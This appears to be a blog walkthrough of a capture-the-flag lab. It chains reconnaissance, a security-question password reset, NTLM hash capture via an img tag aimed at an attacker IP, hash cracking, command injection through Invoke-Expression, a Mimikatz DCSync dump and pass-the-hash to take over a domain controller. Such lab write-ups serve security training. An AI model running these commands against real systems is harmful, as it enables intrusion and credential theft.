Complex Attack Types: Sample Scenarios 31

4 months ago 44
BOOK THIS SPACE FOR AD
ARTICLE AD

Baris Dincer

This time, our target system is Windows and we will infiltrate the internal network and perform an attack on the Domain Controller.

In this article, you will see what you can do about ADs and how you can think about complex thought structures. We will also add many methods to our attack scenario using various tools and principles.

You may see that the IPs change from time to time, do not care, we will be using different machines as we progress. The entire methodology is the same.

Do you want to start punks?

Let’s do that together.

First, let’s save the values and directories ​​we will use most on the shell. Then, let’s register the target machine on our local DNS using our /etc/hosts file.

output
output

Just ping it to check.

output

We are ready now.

We are in the discovery department. We need to better define the target machine and discover its network structure.

First, let’s do a subdomain search, there are many tools for this, but we preferred to use ffuf:

ffuf -w $wordlist_sub -u http://ourtargetsite.thm -H “Host: FUZZ.ourtargetsite.thm” -c -v

output

Or we can use gobuster dns -d ourtargetsite.thm -w $wordlist_sub -i -c

output

This way you can conduct subdomain research. It’s time to take note of what we found and move on to the next step.

Now we can switch to the nmap tool. We will use this command to get to know the machine in front of us better: nmap -sV -sC -sS -T4 -A -oN nmap_result.txt -Pn --min-rate=300 --max-retries=3 -p- $target_ip

-sV:Service Version Detection: Probes open ports to determine what service and version are running.-sC:Default Scripts: Enables the use of the default set of nmap scripts. These scripts perform a variety of tasks, such as version detection and basic vulnerability checks.-sS:SYN Scan: Performs a TCP SYN scan, which is a more stealthy scan compared to a full TCP connect scan.-T4:Timing Template: Sets the timing template to 4 (Aggressive), speeding up the scan by reducing wait times between probe transmissions.-A:Aggressive Scan Options: Enables several advanced and aggressive scan options, including OS detection, version detection, script scanning, and traceroute.-oN nmap_result.txt:Output to Normal File: Saves the scan results in normal output format to the specified file (nmap_result.txt).-Pn:No Ping: Disables the ping scan. nmap will not try to ping the target hosts before scanning. Useful for scanning hosts that do not respond to ping requests (ICMP).--min-rate=300:Minimum Packet Rate: Ensures that nmap sends packets at a rate of at least 300 packets per second to speed up the scan.--max-retries=3:Maximum Retries: Limits the number of retransmissions of packets to 3 times, which can speed up the scan by reducing the wait for slow or unresponsive ports.-p-:Scan All Ports: Scans all 65535 ports.

It may take a while for you to hear back, but be patient. You will get good information from here.

output
output
output
output
output
output

The output is quite long. You can check it yourself. We shared some points.

As you can see, we have open ports and version information. You’ve also seen advisory CVE notes.

53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5223/tcp open hpvirtgrp
5229/tcp open jaxflow
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
5985/tcp open wsman
7070/tcp open realserver
7443/tcp open oracleas-https
7777/tcp open cbt
9090/tcp open zeus-admin
9091/tcp open xmltec-xmlmail
9389/tcp open adws
49671/tcp open unknown
49672/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49694/tcp open unknown
49894/tcp open unknown

There are many doors before us… In a real scenario, it is recommended that you conduct research on all of them and obtain all the information you can.

Let’s give information about some ports.

53/tcp open domain: DNS (Domain Name System) service, which translates domain names to IP addresses.80/tcp open http: HTTP (Hypertext Transfer Protocol) service, used for web traffic.88/tcp open kerberos-sec: Kerberos authentication system, which is used for network authentication.135/tcp open msrpc: Microsoft RPC (Remote Procedure Call), used for remote administration.139/tcp open netbios-ssn: NetBIOS Session Service, used for file and printer sharing.389/tcp open ldap: LDAP (Lightweight Directory Access Protocol), used for directory services.445/tcp open microsoft-ds: Microsoft-DS (Directory Services), used for SMB (Server Message Block) file sharing.464/tcp open kpasswd5: Kerberos password change protocol.593/tcp open http-rpc-epmap: HTTP RPC over epmap (EndPoint Mapper), used for DCOM services.636/tcp open ldapssl: LDAP over SSL (Secure Sockets Layer), secure version of LDAP.2179/tcp open vmrdp: Virtual Machine Remote Desktop Protocol, used for managing virtual machines.3268/tcp open globalcatLDAP: Global Catalog LDAP, used in Active Directory for searches.3269/tcp open globalcatLDAPssl: Global Catalog LDAP over SSL, secure version of Global Catalog LDAP.3389/tcp open ms-wbt-server: Microsoft WBT (Windows Based Terminal) Server, used for Remote Desktop Protocol (RDP).5223/tcp open hpvirtgrp: HP Virtual Group Management Service.5229/tcp open jaxflow: JAXFlow, used for certain application management or monitoring.5269/tcp open xmpp-server: XMPP (Extensible Messaging and Presence Protocol) server, used for server-to-server communication in XMPP networks (e.g., Jabber).5270/tcp open xmp: XMP (eXtensible Messaging and Presence Protocol), likely used for some other messaging service.5985/tcp open wsman: WS-Management (Web Services-Management) protocol, used for system management.7070/tcp open realserver: RealNetworks RealServer, used for streaming media services.7443/tcp open oracleas-https: Oracle Application Server HTTPS, secure web services provided by Oracle Application Server.7777/tcp open cbt: CBT (Common Business Oriented Language), often used by Oracle Application Server or other web services.9090/tcp open zeus-admin: Zeus Web Server admin interface, used for managing the Zeus web server.9091/tcp open xmltec-xmlmail: XMLmail service, used for XML-based email communications.9389/tcp open adws: Active Directory Web Services, used for web-based management of Active Directory.

With practice, you will better understand what these ports do over time.

There is a detail that caught our attention.

3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WINDCORP
| NetBIOS_Domain_Name: WINDCORP
| NetBIOS_Computer_Name: FIRE
| DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-27T10:03:02+00:00
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Issuer: commonName=Fire.windcorp.thm
The scan reveals that the target machine belongs to a domain named windcorp.thm.The NetBIOS domain name and the DNS domain name are both WINDCORP.The target machine’s NetBIOS computer name is FIRE and its DNS computer name is Fire.windcorp.thm.

Add it to your /etc/hosts file.

output

Go there.

output

Let’s do some research and see what we can find.

output

Here is a list of IT employees. These can often be used as usernames with similar naming.

So save these.

organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
brownostrich284
sadswan869
whiteleopard529
happymeercat399
orangegorilla428
output

We also have potential usernames. You can increase this list.

Have you seen the phrase “openfire”? We also learned that they use Spark infrastructure. The Openfire Admin Console was accessible over port 9090. We saw this in our nmap output.

output

Spark is an Open Source, cross-platform IM client optimized for businesses and organizations. It features built-in support for group chat, telephony integration, and strong security. It also offers a great end-user experience with features like in-line spell checking, group chat room bookmarks, and tabbed conversations.

Note all findings.

Continue browsing the page.

output

Sometimes you want to make a gesture to your employees, but this is a security breach for your company.

Here are photos of the employees. One of them also has a dog…

output

Pay attention to the file name!

There is a different name here besides the employee.

Dog’s name? We will see.

Do you remember fire.windcorp.thm? There was a password reset button here.

Now let’s try it with the information we have obtained.

output

Target the user who gave their dog’s name as the filename:lilyle

Also change the security question to one that includes the pet name: Sparky

You may need to try a combination here. But it’s worth it.

output
output

We told you it would be worth it!

Now we have reset the password.

It’s time to try this username and password we have obtained on other applications.

SMB shares are also among the elements with which we can expand our attack surface.

SMB (Server Message Block) is a network file sharing protocol that allows applications and users to read and write to files and request services from server programs in a computer network. It is commonly used in Windows-based networks for file and printer sharing, as well as inter-process communication.

SMB allows files to be shared between computers on a network, enabling users to access and manage files on remote servers as if they were on the local machine.

Port 445/tcp (microsoft-ds): This is the primary port used by SMB for direct communication over TCP/IP without the need for the older NetBIOS layer.Port 139/tcp (netbios-ssn): This port is used by SMB over NetBIOS over TCP/IP. It is used for older systems and for backward compatibility.

We need to use the smbclient tool and enumerate the target machine: smbclient -L //10.10.238.216

output

Root password… We don’t have it.

But we have Lilyle’s password.

Use it: smbclient -L //10.10.238.216 -U lilyle

output

Yeap! Shares were poured out before us. Let’s go into detail:

smbclient //10.10.238.216/Shared -U lilyle

or smbclient \\\\10.10.238.216\\Shared -U Windcorp.thm\\lilyle

output
output

As you can see, we have started to navigate the system.

Now let’s look at other potential usernames: smbclient \\\\10.10.238.216\\Users -U Windcorp.thm\\lilyle

output

We noticed that Spark version 2.8.3 was installed. This allows us to conduct an exploit investigation on this version.

output

Not quite what we wanted. We may conduct research on the Internet.

Check that: https://nvd.nist.gov/vuln/detail/CVE-2020-12772

We also have CVE number now: CVE-2020–12772

You will get such a resource in your research: https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md

When we opened a chat with another user, we could send an <img tag to that user with an external URL as the source of that image, like this:

<img src=[external_ip]/test.img>

Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!

By running responder, we could capture the hashes and use them to gain access to the user account and escalate our privileges (depending on the user of course).

We need to apply this theory.

After installing, integrate the package into the system: sudo dpkg -i spark_2_8_3.deb

Follow the installation steps carefully. Then connect using the login information you have.

Username: lilylePassword: ******Domain: windcorp.thm
output
output
output

Download any image from the internet to your local as our_image.jpg. We will use <img src=”http://10.6.33.73/our_image.jpg"

Pick one of the active users. We will choose “Buse”.

output
output

You must run the responder tool before sending the tag to the target.

Responder is a popular tool in the Kali Linux distribution used for network penetration testing and auditing. It is designed to capture various types of network traffic and responses, including hashes, authentication requests, and credentials, primarily by exploiting vulnerabilities in the way network protocols handle name resolution. Responder is also an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Remember, our goal is to obtain the NTLM hash and our target is Buse.

Use it to activate: sudo responder -I tun0 -dwv

output

Just send a message with our tag.

output

Wow! We have:

[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.226.131
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:010100000000
00003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C
004B00490054000400120073006D0062002E006C006F00630061006C0003002800730065007200760065007200320030003000
33002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000
00000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A0010000000
0000000000000000000000000000090000000000000000000000
[*] Skipping previously captured hash for WINDCORP\buse

Save the hash you obtained.

output

We will break this using the john tool: john buse_hash --wordlist=/usr/share/wordlists/rockyou.txt

You will get this result:

└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
***
***
Press 'q' or Ctrl-C to abort, almost any other key for status
uzunLM+3131 (buse)
***
***

Now we have another password!

You can also use hashcat additionally for this cracking: hashcat -m 5600 buse_hash /usr/share/wordlists/rockyou.txt

Next is to use the evil-winrm tool.

Evil-WinRM is a PowerShell-based tool used for remote management of Windows systems. It leverages the Windows Remote Management (WinRM) protocol to execute commands and manage files on remote Windows machines. Evil-WinRM is particularly popular among penetration testers and red teamers for post-exploitation activities.

Use it evil-winrm -i 10.10.238.216 -u buse -p uzunLM+3131

output

Or you can also do it by just providing the NLTM hash: evil-winrm -i 10.10.238.216 -u buse -H <NTLM-hash>

buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000

Let’s explore the system we have captured a little bit.

output

Let’s move on to some more complex commands. Remember, this is a powershell environment.

Use (Get-ADUser $env:USERNAME -Properties *).MemberOf

Get-ADUser:This cmdlet is used to get a user object or perform a search to retrieve multiple user objects from Active Directory.$env:USERNAME:This environment variable contains the username of the currently logged-in user. PowerShell retrieves the value of this variable to dynamically get the username.-Properties *:The -Properties parameter specifies which properties of the AD user object should be retrieved. The asterisk (*) indicates that all properties should be retrieved..MemberOf:This part accesses the MemberOf property of the AD user object, which contains a list of distinguished names (DNs) of the groups the user is a member of.
output

Remember IT people. Now let’s query them: (Get-ADGroup “IT” -Properties *).MemberOf

output

The command (Get-ADGroup "IT" -Properties *).MemberOf retrieves the groups that the "IT" group is a member of in an Active Directory (AD) environment.

CN=Account Operators,CN=Builtin,DC=windcorp,DC=thm:

The “IT” group is a member of the “Account Operators” group, which is a built-in group in the windcorp.thm domain.

CN=Remote Management Users,CN=Builtin,DC=windcorp,DC=thm:

The “IT” group is a member of the “Remote Management Users” group, which is a built-in group that typically has permissions for remote management tasks.

CN=Remote Desktop Users,CN=Builtin,DC=windcorp,DC=thm:

The “IT” group is a member of the “Remote Desktop Users” group, which is a built-in group that has permissions to log in to the system via Remote Desktop.

List all computers in AD: Get-ADComputer -Filter *

output

There are many commands for AD where you can get information. You can try these yourself.

Let’s continue.

Let’s target a different user in the environment:brittanycr

You can check if the user account is enabled: Get-ADUser -Identity “brittanycr” -Properties “Enabled” | Select-Object -ExpandProperty Enabled

output

Use it Set-ADAccountPassword -Identity brittanycr -Reset -NewPassword (ConvertTo-SecureString -AsPlainText “ChangePassOur::!0” -Force)

output

You can check when the password was last set for a user: Get-ADUser -Identity “brittanycr” -Properties “PasswordLastSet” | Select-Object -ExpandProperty PasswordLastSet

output

Password change process was successful. Our new password is ChangePassOur::!0

output

But “brittanycr” user does not have WinRM privileges…

Explore a bit.

output

There is a powershell script called checkservers.ps1. Check this out. Maybe we’ll get some proof.

output

A PowerShell script called checkservers.ps1, which is used to check a file called hosts.txt located in C:\Users\brittanycr\ and passes the contents of the host file to Invoke-Expression.

We can manipulate it.

Let’s create a hosts.txt file in our local area and write the following in it: ; Add-ADGroupMember -Identity “Domain Admins” -Members “buse” ; Add-ADGroupMember -Identity “Administrators” -Members “buse”

output

Then upload it to brittanycr’s user folder via SMB: smbclient \\\\10.10.238.216\\Users -U Windcorp.thm\\brittanycr

Use this password we have created: ChangePassOur::!0

output

Now download this to your local: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1

output

Then copy to root directory.

output

Just upload to target system. Use upload Invoke-Mimikatz.ps1

output

Activate it: . .\Invoke-Mimikatz.ps1

The magic begins when we type the following command:

Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /user:windcorp\Administrator"'
output

We have the admin’s hash value: bfa4cae19504e0591ef0a523a1936cd4

Let’s connect via WinRM: evil-winrm -i 10.10.238.216 -u Administrator -H bfa4cae19504e0591ef0a523a1936cd4

output

Now perform the following commands one by one:

New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -name 'DisableRestrictedAdmin' -PropertyType 'DWORD' -value '0' -force
outputNew-ItemProperty:This cmdlet is used to create a new property (or registry entry) in a specified registry path.-Path ‘HKLM:\System\CurrentControlSet\Control\Lsa’:Specifies the registry path where the new property will be created. In this case, it’s under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa.-name ‘DisableRestrictedAdmin’:Specifies the name of the new registry entry to be created (DisableRestrictedAdmin).-PropertyType ‘DWORD’:Specifies the type of the property to be created. DWORD stands for a double-word value (32-bit integer).-value ‘0’:Specifies the value to assign to the DisableRestrictedAdmin registry entry. Here, it sets the value to 0.-force:Forces the creation of the new registry entry, even if it already exists.

Now connect: xfreerdp /v:10.10.238.216 /u:Administrator /pth:bfa4cae19504e0591ef0a523a1936cd4 /dynamic-resolution

output

We are inside now!

Don’t give up on hacking.

Code for good.

^-^

Read Entire Article